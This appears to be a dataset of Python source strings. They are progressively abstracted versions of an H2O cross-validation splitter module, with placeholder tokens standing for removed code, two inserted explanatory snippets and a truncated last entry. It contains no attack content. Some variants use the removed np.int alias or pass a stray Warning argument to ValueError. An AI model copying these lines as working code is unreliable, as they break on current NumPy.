return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n",
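A usage sketch for these splitters. It assumes a reachable H2O cluster, that the module above is importable (it relies on the base-class split wiring shown in the earlier, less-abstracted steps), and that the column names and shapes below are illustrative; H2OFrame construction details can vary across h2o versions.

import h2o

h2o.init()
frame = h2o.H2OFrame({'x': list(range(10)), 'y': [0, 1] * 5})
cv = H2OKFold(n_folds=2, shuffle=True, random_state=42)  # from this module
for train_idx, test_idx in cv.split(frame):
    # H2OFrame supports row selection with a list of integer indices.
    train = frame[list(train_idx), :]
    test = frame[list(test_idx), :]
    print(train.shape, test.shape)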
"<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n <function token>\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n",
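Why _iter_indices backfills missing indices: np.round can under-allocate n_i and t_i, leaving a few rows in neither split, so those rows are found via bincount, permuted, and used to top up train and test. A toy rendering of that branch (train top-up omitted for brevity; all numbers are illustrative):

import numpy as np

rng = np.random.RandomState(0)
target = np.array([0] * 7 + [1] * 3)
n_train, n_test = 7, 3
train = [0, 1, 2, 3, 4, 7, 8]  # pretend the per-class pass placed these...
test = [5, 6]                  # ...and left index 9 unassigned
if len(train) + len(test) < n_train + n_test:
    # Rows with a zero bincount entry were assigned to neither split.
    missing = np.where(np.bincount(train + test,
                                   minlength=len(target)) == 0)[0]
    missing = rng.permutation(missing)
    n_missing_test = n_test - len(test)
    if n_missing_test > 0:
        test.extend(missing[-n_missing_test:])
print(sorted(int(i) for i in test))  # [5, 6, 9]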
This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n 